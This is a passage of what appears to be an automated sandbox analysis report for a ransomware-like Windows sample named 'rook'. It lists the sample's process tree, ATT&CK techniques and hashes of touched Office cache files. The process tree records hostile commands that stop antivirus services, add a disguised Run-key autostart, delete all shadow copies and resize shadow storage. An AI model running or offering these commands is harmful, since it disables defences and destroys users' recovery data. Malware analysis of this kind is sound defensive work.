- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:4084
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mfefire /y
  2⤵
  PID:3580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfefire /y
    3⤵
    PID:3820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe" /f
  2⤵
  PID:4020
- - C:\Windows\system32\reg.exe
    REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3464
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:6228
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:6264
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:6360
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:6424
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6480
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6552
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6608
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6664
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6720
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6776
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6832
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6896
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6964
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7032
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:7100

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-5421362794698363021897978671-100230107-1062271979-985761164-15439005743924141"
1⤵
PID:3044

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1333940315-399933193-1478787806-338529334-1859592565-1431277404-122623467-1767469793"
1⤵
PID:1736

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3646433142038829013967827164-1086774794-946619209295358955-705558250199044918"
1⤵
PID:2344

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17593178541981496763-1388554178-19811683391437745081272548614-1649125032-1231793862"
1⤵
PID:2676

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "578556770-18822532361711722222-976290058-1714429978-896565157-1661196426-1435574950"
1⤵
PID:2480

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1662389980-17725430930881657163125752526284764-400841821-1189176428-128468103"
1⤵
PID:3796

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1112184623-406756219-18459989601491266560-2130201-961132851-5232839381862846937"
1⤵
PID:3864

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17481501131169360251358601099-11337593091984918448-2133745480-1362870590-1862169722"
1⤵
PID:3368

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "444718463-1810049508-994683485-11808961811012867721325965143-886762392427119352"
1⤵
PID:3212

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "582160356-677070541-1527210879-1249394159-1189533405-1793989681-582495671-2131238929"
1⤵
PID:3800

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-88971160-1368192534-123605803-12686088883589758352107867460-998745145-1781773031"
1⤵
PID:3640

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2082262733546461655-687342051-736872644-12692857151413155633-74637524-848938192"
1⤵
PID:3364

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "743046643782190994609610521663645648-184212961472688994463405272-781024413"
1⤵
PID:4052

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2071205182-2104904385-17846659685689055832072919777-1449377544-17625975121402940984"
1⤵
PID:3672

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1364035184784704745-1601754509-40246277915152062-8533762514937215501134853692"
1⤵
PID:4000

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-603984229488969101228683053-1485069106-1651302677468725961-10542046391629084177"
1⤵
PID:3976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-20301188261406683772-1946536831-904142002-1253206783-13810474322103501050-1622169919"
1⤵
PID:3592

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "618350140-11287747-2001625050-203546936918255152520730361652085382310-1551263295"
1⤵
PID:3848

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1024488290-23706250721925187-23514153311263008291054477625-1933887751-1421985258"
1⤵
PID:3956

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1678652308-81220195-12161994858398785081815089722-1520980130-69518966-1099099208"
1⤵
PID:3604

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1979546145-127992206-1280658350-2003237735-578142928827445553-20603248501799167823"
1⤵
PID:3564

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1337920837-628227599-19589276011326293441-1557256802-158834026111839698512115719581"
1⤵
PID:4032

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5314118061806443467209838254-1912733810-745705209-925169959-867615923-2138664665"
1⤵
PID:3876

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-905550296-185580488313822628131228726801-124763406515011225801759326625925779606"
1⤵
PID:3628

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-665873565181635791-396581121-18895304674119266051804775910278936758285359927"
1⤵
PID:3624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1262435084-34281508-1765046619-578840012374100834109131422819637419551583869756"
1⤵
PID:4068

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2065836390-2091590095-1916699627712273105-1420163787-311110547-1845263246-632303518"
1⤵
PID:3916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-637025638-144791768267749654611598785328651187312137024793-403716103645898087"
1⤵
PID:3928

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1788903283-677388120-283420937-96206304094891536114805541951957961432-1015369710"
1⤵
PID:3600

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:3576

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:7696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OWOW64WW.cab

Filesize
22.8MB

MD5
2ef91599bdda0ac97e3dd6582566e3fa

SHA1
302ed9cda9724f4edc1ac1f1cd032d14e93ee700

SHA256
9ec76440d22bebf02b4874a9d2cb45aa93f8f743b7bbe24200f37c02986531a5

SHA512
97149f2b26eb1b3fa344d5cb68479535db930695e73ab54a724ebe403999e0f570e6ab66ba4c3c6ba5abfce1196a9b6a4ebf0013521d8a5b199799ce06a6109c

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.msi

Filesize
2.9MB

MD5
402e68105178e18c83d384f1aa4a5ec9

SHA1
be18e1acaba5c502547660c3f3247ffd43f10c8b

SHA256
f8f93bc101c8b89409ea212b5980bf479acca80309d192e7f5554ae21bb71e07

SHA512
938cc5dbe53e26bea75c0c170f80ce81cff366c3dabc311f0c1bc4e28b2246d05a4bc568c9389543af14a297ffaea68daac46dd448d5cced1dd4350f1cbed3ed

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml

Filesize
4KB

MD5
07f4a6ccfc9f8a83aba63ed12dca65f3

SHA1
7f464aa9c84cdc35bfa3a9f3c3180cd868525873

SHA256
61630870df393fc248a4fd6c190ae3979f5442bbe1c30270cd462b8b627eaf91

SHA512
694245a0f664648cfa2fcce4122c4284259d96c89ec33c924564c0e9dc49bad5c9bb228da6fa2be365a0fe923d6fbb8b7540750c8674ecb32f8597329177bbda

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi

Filesize
23.7MB

MD5
83d032508075cce9b78fffec7acfcecd

SHA1
afd9061a0952edbc8e595eabe96e6575762dd08a

SHA256
cf23af5a4c7801828c7aa459160d25802ecbb1b8ec6e671e0e427fc6aa7262b9

SHA512
d2a10d10d42ca8c0fda6d977e9acd043f05c259dca882ce40cc849af4e3ec0511ba8c801702bdade63caba7b49a9c1b5f100219651b0987b728b7f62688a970d

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml

Filesize
17KB

MD5
5c5436a3c26c6803994962b9313ac972

SHA1
fe03e1a21d1c197278fc652699709141c810a3a8

SHA256
27842d64c2deef2bf5463da6dc868a40fa941434616f33c581b0dafb986d0e9d

SHA512
66379eeb9e038535344c9ddc9eb644e2f15fbe731bedad2c3504939b5cde9bcc9925262cd131fe587cb6c5afc80e02999e21bd4a8687e7db50db2b4874547410

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml

Filesize
31KB

MD5
92d02f3edd568078842e9c43eea6061a

SHA1
38d18fca68525101139506dc1bc1e751749f58b5

SHA256
413057139bc3eb5f7390d153fe9ca3a136e62162bbfd50fd94c60b04ac8fb9d9

SHA512
66646788285c76d1c3500a7681e613d3376f08023c22ba2ed8d27a8e3459ac8990997f329d8a43c7437e94f2af9f1b2708456d9ef5b8f4f425d7d5e770c40ec9

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\pkeyconfig-office.xrm-ms

Filesize
699KB

MD5
ea42f7c572c33cabc76bfa291ff40847

SHA1
6c16d21dcd45f3aa65263f75d485b0511d45bd16

SHA256
55b6c43c264ae9795da9265395a95b3559fd5138aae50b766b5bc454f4f0b0c1

SHA512
e14bed77595c6bc198b4829c75cfa3670cf71bf705229fc9dbba6d6a4067512385a2f78d44a4695a4c95e542013ff1c0c539e8fd6c4e16296317dc336533a039

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelLR.cab

Filesize
16.1MB

MD5
67e13b97f4748fd67bd9c87268907b9e

SHA1
7319541062d38379d6bdefeae8bc83d6b6de4fd5

SHA256
909d19b03ada6ade9b7aa9531ee2b09f656891129a5a89687ddf94dda3368de5

SHA512
fc2df095147f7e3bf89be7a4913ddc3e4357cf4f0f76be3441250b986584266a7aaddcf4ba640969e8cb9997b5d56f3fc2dd67aad0182f4ff8b608695f271197

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.msi

Filesize
1.7MB

MD5
bcea1239de07dc6acb22cd0576730be2

SHA1
14127aef9e82b71bc07e8aeed18252afb0dd152c

SHA256
7c8a76de096718a439d2c22f543b839809aa164090f41058b0bc49d12874c1fb

SHA512
68f777c60e786f0865214e83f725226f5909e95e0322f07405302dbbea11e173d1316c7d4e99904531ec8dcdc313357a9a43e5053889cf1ec311428ef29d238c

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml

Filesize
1KB

MD5
6b0e67e3e9c5a3ebb9391e84e29c8f60

SHA1
b1cdc17111b786fcdef9eab0a88154661223d728

SHA256
1531d097f2e679d655ddd19df11361f7c0429a86d3354b3e4dfa28ebeb01f00c

SHA512
11380992ad6166604e79216197a413ab66dcdf93fb2e1cc32b6710d926f3b2dfaad5f65c6d4389e6aa7bd04adf407abd04e484c97794f007bee77ca9e085f68b

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml

Filesize
2KB

MD5
00bfcfe0fb7db1241319a489fd45f010

SHA1
12421a4fef10309cd7176a4ce28c3b426e9af78b

SHA256
3d7a9c8032cb2a13a816f5b7a4448f83f34a53dd2db66ecb0171ec5a0f38435e

SHA512
a5d1ba1bac859bdc69465773a812df11055ce48cdc6a0da1240ac6302ca6aab00b52849fa3c71a3167a19614dea08903ac2757c5177b97483b8a44bee0a1caec

Download Submit
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.msi

Filesize
1.7MB

MD5
9c4b2939230416ee1f16a49395895ff0

SHA1
99946b315823c484ac59b5a8c266bd2522fb084b

SHA256
0124b1513144ad28d21426b97ef4360ad6a88fefb65571db35631e917413e3c5

SHA512
d0903f8e706f8334a24bb0ab6bb94d302ce114f41d2710c5ba6c563ceefe950dcf94022ab2cba6f50874748cbea7fbe339da39fe07d77d89d42bbbe57312c796

Download Submit
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml

Filesize
1KB

MD5
2875978740ca4a1157834f6a30e03447

SHA1
2af9bd73d665a34d10505fcd5fb0a7291ce18590

SHA256
a9708b035ea4fe111ba02034597b0de2c71d92c651d74e44d54ee55d1e8750ff

SHA512
e5de4ee70f127f75388f98c7880779be303e02be47242609a2aa11c82b45149114dec3a506993105defc808ed04f20845d2c109977f9ef48af734f7392573e67

Download Submit
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml

Filesize
2KB

MD5
41ed5f848a8ba68272bb27fb72bb9772

SHA1
a2760a65988b2e6ba1cf18d2905d6a2ae5f7868a

SHA256
81cd017d5f00253c44f43821dc3e9897b6108dd8bea69731661b22678ff48444

SHA512
d2d7a59c019ccbe28ca0ad068a88d11facd171b217c3d66e56266c0df0fd7e65fcee2d5363ac49d012efb8d8cc798d59615a23dd05f52ff8993fe880a243fe1f

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PubLR.cab

Filesize
9.5MB

MD5
1a3f4418bf9ffa22c7ce52598bb16ab4

SHA1
a889ce9efbafbb946850ac5c964e1bc3429618d0

SHA256
2006914653323dc93ea7c100e7e167f741f8696e32e8eef454d34bc34a51b00b

SHA512
6d24e721631faa29c5e3fb073d5ef4df76442869e1a6c92d05881e384711be04a6fcfb51bdff2e477fe7a7529c27cd4c10fb7c41e3c36a3f9fc3d3b0e655ef0c

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.msi

Filesize
1.7MB

MD5
16f4d5706f0f9f12f06b245c4fa8165d

SHA1
ea6da0735690ca379088fa3ff7d5d4202d4d46d4

SHA256
4de3cd5f53a496a63c1fc72e449e5a3a62779c87fbf172f4a9288f843de42ce7

SHA512
b0542879924a9053ad41397194dfe79730e777b598e915ffbc65f91d2629b47abac929429c16878cb2e04dcf56597bbd6e429afe6b45bd538c61fe178c789abd

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml

Filesize
1KB

MD5
731e6e7a1ee7c946e44e737850cfc8e2

SHA1
b2fb31a2ab0add4f76bb6a5d8c231ecb255f3790

SHA256
75380fd6aaa325e621962b33c19d0714e99ff7b7a8d143add3ab38776b9eb03f

SHA512
d76c51457a03c448ed5408a382e7e2c659ac309f3c164a1fae8fbe858225dd875ddbaaed374002dd5b27d5e3e42f33ca45c73b26c1dbe95559bf96322c2387cc

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml

Filesize
1KB

MD5
9bda0173bf830e2ccaee177cf6fa3be4

SHA1
7e6b0213e9f108208e16b460e1860ee037542a64

SHA256
1455b54e5710b77913a09294a1329d21809068fd6455055268854743177a4949

SHA512
a4f041eabaac21be4738b157ff47605b6c101075431e9c83ddd919c6192519bbcc9eb9c2cd7331bfa014af2f76b0a4ce38b5554d3aecb361889740e2b4c7fc47

Download Submit
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlkLR.cab

Filesize
14.1MB

MD5
47c868c3f7c29c1d3580d236864ea7c6

SHA1
545a278e01c9d40dca7b19625e087ed274ec2587

SHA256
113f92084e465b30cfcd26efcf6ada5d3a094d0abb4d8987433d4a01e1bea7d3

SHA512
bb8d693a44e5bba36a0b52181c6b0a8483d81de73fa4da0b1f9989f2afc2be1ea660ea60d2297481921107f779e6f1e5f7dcd74a43a6f781d132cec82dad217d

Download Submit
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.msi

Filesize
2.0MB

MD5
c4393fa9c42d7b84c519b8ac0fc410df

SHA1
10855bef750ac1683ab7ec5484ac9fbd7c7ff40b

SHA256
66e08a9539886824ce507318faa045b20f27d2eca9ca00210fd092ec9f2121ee

SHA512
a050b08c3cacdfe7c8eb4975cfd8c9c041775f1fd7daaaa3d32808f1665fda39f1b759d5642cf5a1c75ad91a4f0815ee84ea6ecf42d5383f8c0abf3c68184204

Download Submit
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml

Filesize
3KB

MD5
5ffdefdf95e62774a42eb8c02127a05d

SHA1
b8992c9634ea9d961878f2ebc74d9af82d7bfc8a

SHA256
9797def19d0d25fc36ca4bd1189354b085d25e6de2d5fde3339db67283e10954

SHA512
bb6accda279580541f9753231a8adf730b7c3c481fa683b93d037d4ef36bab342dbd57130a438ac27e884aa579b8fdb5643d2f0235dcbc50d3cd1f21c6abcad9

Download Submit
C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml

Filesize
4KB

MD5
b848730bdb217136663b1606542f9292

SHA1
e8a3273780f18ed6fcae19f8d43546d8ca4a9896

SHA256
ca26e7d58fe83af89cfab2a19627f72d6d1f9cd6daae28d36e99966288f77863

SHA512
3f6093312cbfccee04b4c173877e0821ed519ceef5ba71c02c219c27d3cd2aa1b33b1ae58f21e14dc50338942ecd191fd1e2e6e5e24278bb8497d46ac74e16d0

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml

Filesize
2KB

MD5
038d8365a8a2681bbb1976a81e24c26f

SHA1
bd4fd2f8bc6912371619b47446e736ec32d47ad2

SHA256
6d76dc0866d79a0710831827b32d01ca455c8b29794bccbdbea4e6848d989392

SHA512
bda0c1a406fe6f5faaa91014abdc676e78c0ba618b7b403b0d5224c61801a0593599b060a60019bb5a3e3ea119d3a1de9c5b9bbe6ff6dfeedd51eab9cd109762

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordLR.cab

Filesize
41.8MB

MD5
f97407e4dffb371a7eb6a3d02b77bb85

SHA1
ec7aaae11aaa28dc900887b9b9c9e94721dbf78f

SHA256
45327d2d439bebba9cb909e1c27bda7949fb76fef756e571aa8a13761f748fc8

SHA512
912a28a551a64cdb103fb280e538327b28afdd7cdc21758c88681bbddaa32c7532caeabb870a3437c93c2ccf3609e979ef29d475511a6ca149109be9bbb7c893

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.msi

Filesize
1.7MB

MD5
35eadad4a34b6878a6f9d05948e3fa99

SHA1
7d666c26e721c709949abd1ba35e536f7fdbe97b

SHA256
6e5c9b974a94f811009aaf15db17f505a6df27673a1ab07dc4251b9a8f97de2c

SHA512
c8cde99636157f7ac028b173fa76251fe058a9c8b505c3a246d9fdf241e044276d219cf9e15aca9e29a7b0446cf741efe7ef649cd31b740d9c0eeaf60d793c16

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml

Filesize
2KB

MD5
bfcd88b6f7d5ef0c697e6aad90ea4703

SHA1
64b0e40cf292a35769a935fc6f7de030a40dadd5

SHA256
a4012f1bbf7e7f6376901304874098a847e6d5d9b5b1f9ad71b10c41a073aa5b

SHA512
7896adbd3df72723c7d7497e01541d751cc801ea884c37b0d315f3877ed6f2eac4fdd822a57ca67add5dfff1422299c7fe729fb02f751b935564605bd6711915

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.cab

Filesize
10.4MB

MD5
d2de450a42300bdbbb7607773d458e1a

SHA1
fcbe8e40fdc5c8b0bed8c5213185646444add3fb

SHA256
04af79de76c2ad3cf64c3a4bd72f20981b87c1f0a761731b23459bd51a1b5922

SHA512
c94156cec11034524c293495c41cd081b95fbf97d72c85675b402ef1bece78561cc2f81b20b4eaf6638f4b3317f333b8e667e94b697612516ff259f49d348d3f

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.msi

Filesize
641KB

MD5
c8f19d23f9674a61ab7d912cb818176c

SHA1
1e14e56f23d8d059fdc21e9afdc57dc207948a6a

SHA256
9dfe9987b90ee411bf56c39519ff71b8afba7c26aefeaf81a3714a11d23e43c2

SHA512
9a7097c6ede9dd428a47d6ff75b97ffa0dc9d1034d5204694800af4a6b3f65668b7717196e6e8c86397697b69e0a59b47fa78ffd1267636c7696646ba00e813b

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.xml

Filesize
1KB

MD5
65d14d862a0d1eeee81d5090c503dee8

SHA1
ac99be18ff4ba5676961a0a48d6b6a4d353b0ec5

SHA256
fa8ac11e24976482fb467706dd6e875666d286d01f6988510fc5f62724be546e

SHA512
05ede506b382209868831c5b732dd4a10f9efb5a1175ff37a4da8ca6a134afedf14983f16db33a342534dc5d5812b0ed68378d929b4bb95d3cf1be35e700dd14

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.cab

Filesize
12.6MB

MD5
6ae16a857b2e64df75ee08700eb8389d

SHA1
293945233fe208cf8545b0da07e501d55ebe6231

SHA256
d08dd6c17282c050f22a104a3c41dc6351bfcb8665b129509b18b7f041fb4482

SHA512
6337ae786dba7fb8aecb14846ee8718b5313c092391c4923e3dab0c19054c27e0d2649de17c4b7e38114d2b6fe10bd2ef1c7b189a04714c80abad943428f0a49

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.msi

Filesize
647KB

MD5
69d331f7d6003b15cf9b98bb6584b0b8

SHA1
a1233f47c5309b8f40bcfa35d6ec20a0ce94918a

SHA256
475f25a1071954a375b3bc4c04495c89f78a1002c8940d1fc6b9a4f56b7d2501

SHA512
d1af40d5853e9996b6d1bc70c55be723152b88aff44c0e94cc3cc257f4a113c719882a5c23baa49ba95509f670a38148b15502f6d4487bc1c1afef774747d608

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.xml

Filesize
1KB

MD5
15e4f0dbe95bc1e297fac3e7bb64db48

SHA1
f69c4a7456fe6affe2634db5b8198ee5c01af0bf

SHA256
6583a3116614f4af2625ba3b784de5ac91892a75fbdf23f0c563601ba2b75b65

SHA512
12327c2ec013a067d45960af271f0b7dbf2fafc47711d8788c96f3b790694c0bbc8ca1c80b014e1be7947d36cac8f82ebbd762713baed67c23f8d5877d903381

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.cab

Filesize
19.5MB

MD5
28372ad561d00841b29a65dc2ef9cc31

SHA1
42324ce8fac0299828bf75ffbb4a39def55408f6

SHA256
a3888fabb033c49bcb76cfc06809bdb3d09a33cda9ab4b37b78d85010f7000d1

SHA512
b10fb76a71e91ebe8e7d834768803bba3c2be045ba3362962ca37c6a91d66cd149820a198a103aadcb0fa62743361c2b3ae025ec788e87701371d8be9ca69f7b

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.msi

Filesize
652KB

MD5
42c3316786dd10d8e06d03d044c14bb3

SHA1
84f7d0c590c59dd0025c6581ccb24a14b4758837

SHA256
d37da3d654e32e90c8b6816ec1a9f43caeaeef986c107bde6960e009454ab742

SHA512
51f51f46ecdaf84d14b3a46dc5ff076291829043f7f49540e52e21dbbb8d4e860c2df720f5041b7e8186218246623272afa2bd5c5a5cf40ec4e9c4ef49ace610

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.xml

Filesize
1KB

MD5
d8599ecae9dfa822f4feeb0d799c89bd

SHA1
c8b784ddeb7b4c44eec5b44d07f904d817493354

SHA256
b894d7b49e0cf4916635a0ae084d9f00729c6a7fe2398dafb76d82124c5a5218

SHA512
00134cf11ff14d5938bb8ffe6b878d0c91a07070aab93833f7d09ecf2e6b3f2be1b7ba710c59837d01a21b3781d5367ee85e985587fe79357f29d73ac1527c1d

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.msi

Filesize
635KB

MD5
179ffe38c0a43f83f30e382edb3a702a

SHA1
9dc7a2dbe623875955988a5e1e31253b374c09c5

SHA256
ea377d250c92edd46f66d1bc18ac4a0162e89db0f9a3c553a4e6730b05742487

SHA512
7455d8395a5751eeace951e2f83847fe584caca8f57b49fc061071c6ef03bde28e2545d39a5f3c207693ed0552391b24cb4b6e99c9c238faaf6d3b98ce156270

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml

Filesize
1KB

MD5
9d0fbb2ec5eb715715a7ebf99602a67d

SHA1
bca1fa97c299428991641e2c8cf437f3241ebbfa

SHA256
ce92a5c78cac55595c5114e85fcf63221eff4d8c8f0ddec7cccbd00bd17b66f1

SHA512
f0700a09cedc3f877ba0ad781c9610e137a22f7f641e07c18a9af0e3cc8427624550df247500fcd85fbdeef987e23f79adeb6c9b6478ef43cd745f79eaaee34e

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Setup.xml

Filesize
6KB

MD5
44977f2f6deff27f8094a276a1df6f1a

SHA1
6ff7d08635285bccf48415a3d779bce72a8b1a54

SHA256
b28a0eccbef337f5b94357a09364bb69d393e4701ea49337c8f74b526f4d2393

SHA512
d9d62f49c45a10fe3092cf4ebc48e59829f034156630c96ab57f00e857e923833c5233b8955540bf98b825eec352a978b4557ca595d28266d489e0c43eef9df1

Download Submit
C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfLR.cab

Filesize
15.0MB

MD5
2bc89b48c4b0848d00d8d0119f8b092f

SHA1
7e0d3e097d35ae92b33a030763f1b79aa23ef0c7

SHA256
32f8d08853028847873b68d205aa07e0b1bb0bcb1bd996e795ab003febae9164

SHA512
e4bed4f6267d36299145e21070040aea44ac5ea8bcfe0fb0559270037cbd4a9478a0a8b0557b8e98a142044bc2cde92588a206f2a150dea645775a4367cbda01

Download Submit
C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.msi

Filesize
